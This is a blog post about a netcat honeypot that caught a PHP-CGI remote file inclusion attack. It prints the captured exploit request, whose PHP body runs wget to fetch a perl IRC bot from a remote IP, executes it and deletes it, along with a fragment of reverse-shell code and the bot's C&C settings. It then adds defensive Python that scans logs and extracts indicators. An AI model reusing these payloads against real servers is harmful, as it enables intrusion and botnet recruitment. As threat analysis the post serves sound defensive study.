Tuesday, October 14, 2014

Welcome to my HoneyPot RFI Guy

There are tons of RFI attacks out there; to study them you only need a honeypot listening on port 80 on a public IP.

I recommend installing inetsim or glastopf, but netcat can be enough to catch some attacks. You only need to launch it, redirect the output to a file and wait:

nc -k -v -l 80 > /var/log/honey.log 2>&1

You can use tools like logsurfer or sec to look for patterns in the log file and alert you, or simply grep the file after a few days to look for RFI attacks:

grep -A10 POST /var/log/honey.log

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 92.222.38.66
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
Content-Length: 2171
Connection: close

<?php system("wget 208.85.177.238/.x/hb/php02 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7 85.214.73.166;rm -rf /tmp/.bash_h1s7 &"); ?>set_time_limit(0);
$ip = '91.121.105.21';
$port = 22;
$chunk_size = 1400;
.....

As you can see in the php system call, the attacker downloads a file from the server 208.85.177.238 and executes it. The php code that follows is a reverse shell that connects to 91.121.105.21 on port 22.
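To automate the grep step, here is an added Python example (mine, not code from the original post) that splits a netcat capture into requests, URL-decodes the request target, and flags php-cgi `-d` directives such as `auto_prepend_file=php://input` (decoding the query string above gives exactly those directives, and that one is what makes the POST body execute as PHP). It then pulls the download URL and remote IPs out of any PHP found in the body. The sample log is constructed: the first request line is the one captured above, while the Host header and the addresses in the body are documentation IPs, and the second request is a benign POST for contrast.

```python
import re
from urllib.parse import unquote_plus

# php-cgi directives that should never arrive on a query string, with the value
# attackers set.  auto_prepend_file=php://input is the key one: it makes PHP
# execute the POST body before anything else.
RISKY_DIRECTIVES = {
    "auto_prepend_file": "php://input",
    "allow_url_include": "on",
    "safe_mode": "off",
    "disable_functions": '""',
}

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD|PUT) (\S+) HTTP/\d\.\d$", re.M)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample of a netcat capture: the first request line is the one
# captured on the page (real query string); Host and the IPs in the body are
# documentation addresses.  The second request is benign.
SAMPLE_LOG = """\
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 192.0.2.10
Content-Type: application/x-www-form-urlencoded
Content-Length: 2171

<?php system("wget 198.51.100.7/.x/hb/php02 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7 203.0.113.5;rm -rf /tmp/.bash_h1s7 &"); ?>set_time_limit(0);
$ip = '203.0.113.9';
$port = 22;
POST /contact HTTP/1.1
Host: 192.0.2.10
Content-Type: application/x-www-form-urlencoded

name=alice&msg=hello
"""


def split_requests(log_text):
    """Split the raw capture into one string per HTTP request."""
    starts = [m.start() for m in REQUEST_LINE.finditer(log_text)]
    ends = starts[1:] + [len(log_text)]
    return [log_text[s:e] for s, e in zip(starts, ends)]


def php_directives(target):
    """URL-decode the request target and return every `-d key=value` pair in it."""
    if "?" not in target:
        return {}
    query = unquote_plus(target.split("?", 1)[1])
    return dict(re.findall(r"-d\s+([\w.]+)=(\S*)", query))


def analyse(request):
    """Return a findings dict for one request; an empty dict means nothing suspicious."""
    first_line, _, rest = request.partition("\n")
    target = REQUEST_LINE.match(first_line).group(2)
    _headers, _, body = rest.partition("\n\n")
    findings = {}
    directives = php_directives(target)
    hits = {k: v for k, v in directives.items() if RISKY_DIRECTIVES.get(k) == v}
    if hits:
        findings["php_cgi_directives"] = hits
    if "<?php" in body:
        findings["php_in_body"] = True
        urls = re.findall(r"\b(?:wget|curl)\s+(\S+)", body)
        if urls:
            findings["download_urls"] = urls
        findings["remote_ips"] = sorted(set(IPV4.findall(body)))
    return findings


def scan(log_text):
    """Run analyse() over every request and keep only the suspicious ones."""
    results = []
    for request in split_requests(log_text):
        findings = analyse(request)
        if findings:
            results.append((request.split("\n", 1)[0], findings))
    return results


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LOG):
        print(line[:60] + "...")
        for key, value in findings.items():
            print("  %s: %s" % (key, value))
```

Run it against `/var/log/honey.log` by passing the file contents to `scan()`; the directive check is the part worth keeping, since it fires on the query string alone even when the body is something other than a wget-and-execute one-liner.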

Let's look at the script:

wget 208.85.177.238/.x/hb/php02
more php02

$p = "";
for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
}
my @ps = (" ");
my $processo = $ps[rand scalar @ps];
$servidor='194.24.228.203' unless $servidor;
my $porta='443';
my @canais=("#allornothing");
.....

That's the typical perl IRC bot; you can use a tool like ircsnapshot from @botnet_hunter to gather information from the botnet. At the moment access to the C&C server is filtered; it could be that they only permit IPs that have successfully executed the reverse shell.
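For the information-gathering step, here is an added Python example (mine, not from the post and not part of ircsnapshot) that pulls the IRC C&C indicators out of a dropped perl bot of this shape: server, port, channels, and the nick prefix and number range from getnick, plus a regex for spotting those nicks in IRC logs or in strings carved from a capture. The source excerpt is constructed to mirror the lines shown above; the server address is a documentation IP rather than the one on the page.

```python
import re

# Constructed excerpt mirroring the lines of the dropped perl script shown
# above; the server address is a documentation IP, not the page's.
BOT_SOURCE = """
my @ps = (" ");
my $processo = $ps[rand scalar @ps];
$servidor='203.0.113.44' unless $servidor;
my $porta='443';
my @canais=("#allornothing", "#second");
sub getnick {
  return "Rizee|ZYN|01|".int(rand(8999)+1000);
}
"""


def _scalar(source, name):
    """Value of a single-quoted perl scalar assignment such as $porta='443'."""
    m = re.search(r"\$%s\s*=\s*'([^']*)'" % name, source)
    return m.group(1) if m else None


def extract_c2(source):
    """Pull the IRC C&C indicators out of a perl bot of this family."""
    chans = re.search(r"@canais\s*=\s*\((.*?)\);", source, re.S)
    nick = re.search(r'return\s+"([^"]*)"\s*\.\s*int\(rand\((\d+)\)\+(\d+)\)', source)
    port = _scalar(source, "porta")
    info = {
        "server": _scalar(source, "servidor"),
        "port": int(port) if port else None,
        "channels": re.findall(r'"([^"]+)"', chans.group(1)) if chans else [],
        "nick_prefix": None,
        "nick_suffix_range": None,
    }
    if nick:
        span, offset = int(nick.group(2)), int(nick.group(3))
        info["nick_prefix"] = nick.group(1)
        # int(rand(N)+M) yields the integers M .. M+N-1
        info["nick_suffix_range"] = (offset, offset + span - 1)
    return info


def nick_pattern(info):
    """Regex matching the nicks this bot generates (for IRC logs or carved strings)."""
    lo, hi = info["nick_suffix_range"]
    digits = r"\d{%d,%d}" % (len(str(lo)), len(str(hi)))
    return re.compile(re.escape(info["nick_prefix"]) + digits)


if __name__ == "__main__":
    c2 = extract_c2(BOT_SOURCE)
    for key, value in c2.items():
        print("%s: %s" % (key, value))
    print("nick regex:", nick_pattern(c2).pattern)
```

The server and port are what you would hand to a firewall or IDS; the channel list and nick regex are what you would look for in IRC traffic to tell this bot's joins apart from anything else on the same server.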

Script file names

Why would someone use 02 in a file name? I think there may be a 01 file as well, so let's check:

wget 208.85.177.238/.x/hb/php01
Connecting to 208.85.177.238:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25709 (25K) [text/plain]
Saving to: `php01.1'

100%[=============================================================================>] 25.709      50,4K/s   in 0,5s

(50,4 KB/s) - `php01' saved [25709/25709]

Bingo!!! How many files are there?

ls -al
total 288
drwxrwxr-x 2 itsuugo itsuugo  4096 oct 14 22:58 .
drwxrwxr-x 3 itsuugo itsuugo  4096 oct 14 21:58 ..
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php01
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php02
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php03
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php04
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php05
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php06
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php07
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php08
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php09
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php10

$wget 208.85.177.238/.x/hb/php11
Connecting to 208.85.177.238:80... connected.
HTTP request sent, awaiting response... 404 Not Found
ERROR 404: Not Found.

There are 10 files and they only differ in the nick assigned:

diff -c php01 php10
*** php01       
--- php10       
***************
*** 43,49 ****
  #####################

  sub getnick {
!   return "Rizee|ZYN|01|".int(rand(8999)+1000);
  }


--- 43,49 ----
  #####################

  sub getnick {
!   return "Rizee|ZYN|10|".int(rand(8999)+1000);
  }

Could the attacker be preparing different campaigns?

I hope good people like MalwareMustDie can catch them.